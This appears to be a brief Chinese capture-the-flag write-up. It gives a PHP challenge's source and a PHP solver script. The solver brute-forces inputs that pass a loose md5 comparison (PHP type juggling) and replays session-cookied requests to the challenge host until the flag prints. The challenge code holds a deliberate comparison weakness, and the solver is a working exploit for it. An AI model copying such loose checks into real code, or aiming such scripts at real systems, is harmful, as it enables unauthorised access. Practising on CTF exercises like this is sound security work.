源码直接给出
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){
session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
if($_SESSION['nums']>=10){
echo $flag;
}
show_source(__FILE__);
?>
解题php脚本
<?php
$text='ea';
$old_url="http://7c88c08efa944dae8540d570811e1dee3b3e6aa73460417d.game.ichunqiu.com/?value=";
$opts = array (
'http' => array (
'method' => 'GET',
'header'=>
"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" .
"Cookie:PHPSESSID=1dv7j1b0mrv065l9b3r4skgkt3; \r\n".
"Pragma:no-cache\r\n",
)
);
$context = stream_context_create($opts);
$payload=solve($text);
function solve($a){
$i=0;
while(1)
{
$i=$i+1;
$b=$a.$i;
if(substr(md5($b),5,4)==0)
return $b;
}
}
for($i=0;$i<=15;$i++){
$new_url=$old_url.$payload;
$a =file_get_contents($new_url,false,$context);
$b =$a[0].$a[1];
$payload=solve($b);
echo $payload."\n";
}
$web = file_get_contents($old_url,false,$context);
preg_match("/flag{.*?}/",$web,$flag);
echo $flag[0];
?>